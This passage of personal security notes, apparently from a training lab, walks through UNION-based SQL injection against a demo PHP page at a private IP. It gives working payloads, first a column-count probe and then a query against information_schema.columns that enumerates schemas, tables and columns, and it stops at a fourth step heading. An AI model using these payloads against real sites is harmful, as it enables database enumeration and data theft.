matthewjrobinson24/security/notes3.md

     10.50.33.78/uniondemo.php?Selection=3 UNION SELECT 1,2,3

 ### 3-Golden Statement from before.
 #### Alter the options in the middle to match the table thats out of order.
+(OUT OF ORDER TO MATCH THE FIELDS!!!)
     10.50.33.78/uniondemo.php?Selection=3 UNION SELECT table_schema,column_name,table_name FROM information_schema.columns

 ### 4-Modify the Goldent Statement.